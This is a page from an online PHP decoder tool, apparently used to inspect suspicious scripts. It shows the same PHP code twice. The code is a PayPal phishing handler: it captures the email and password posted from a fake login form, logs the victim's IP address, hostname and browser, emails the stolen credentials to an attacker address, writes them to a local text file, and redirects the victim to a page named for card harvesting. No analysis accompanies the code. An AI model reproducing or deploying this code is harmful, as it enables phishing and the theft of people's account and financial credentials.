Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $ip = getenv("REMOTE_ADDR"); $text_result .= "|--------------PayPal Login---------..
Decoded Output download
<?php
$ip = getenv("REMOTE_ADDR");
$text_result .= "|--------------PayPal Login--------------|
";
$text_result .= "Email : ".$_POST['yass_email']."
";
$text_result .= "Password : ".$_POST['yass_password']."
";
$text_result .= "IP : $ip
";
$text_result .= "HOST : ".gethostbyaddr($ip)."
";
$text_result .= "BROWSER : ".$_SERVER['HTTP_USER_AGENT']."
";
$text_result .= "|--------------RooT-Mrx.Tk--------------|
";
$subject = "=?UTF-8?Q?=e2=9d=a4_?= New PPl Login From $ip =?UTF-8?Q?=e2=9d=a4_?=";
$send = "[email protected]";
$headers = 'From: [email protected]' . "
" .
mail($send,$subject,$text_result,$headers);
$file = fopen("root-mrx.txt", 'a');
fwrite($file, $text_result);
$to = "updatecarding.php?".md5(base64_encode(rand(0,10000).gmdate("His")));
header("Location: ".$to."?dispatch=");
?>
Did this file decode correctly?
Original Code
<?php
$ip = getenv("REMOTE_ADDR");
$text_result .= "|--------------PayPal Login--------------|\n";
$text_result .= "Email : ".$_POST['yass_email']."\n";
$text_result .= "Password : ".$_POST['yass_password']."\n";
$text_result .= "IP : $ip\n";
$text_result .= "HOST : ".gethostbyaddr($ip)."\n";
$text_result .= "BROWSER : ".$_SERVER['HTTP_USER_AGENT']."\n";
$text_result .= "|--------------RooT-Mrx.Tk--------------|\n";
$subject = "=?UTF-8?Q?=e2=9d=a4_?= New PPl Login From $ip =?UTF-8?Q?=e2=9d=a4_?=";
$send = "[email protected]";
$headers = 'From: [email protected]' . "\r\n" .
mail($send,$subject,$text_result,$headers);
$file = fopen("root-mrx.txt", 'a');
fwrite($file, $text_result);
$to = "updatecarding.php?".md5(base64_encode(rand(0,10000).gmdate("His")));
header("Location: ".$to."?dispatch=");
?>
Function Calls
| getenv | 1 |
Stats
| MD5 | 072b8920341c243b9559d25b5319b724 |
| Eval Count | 0 |
| Decode Time | 117 ms |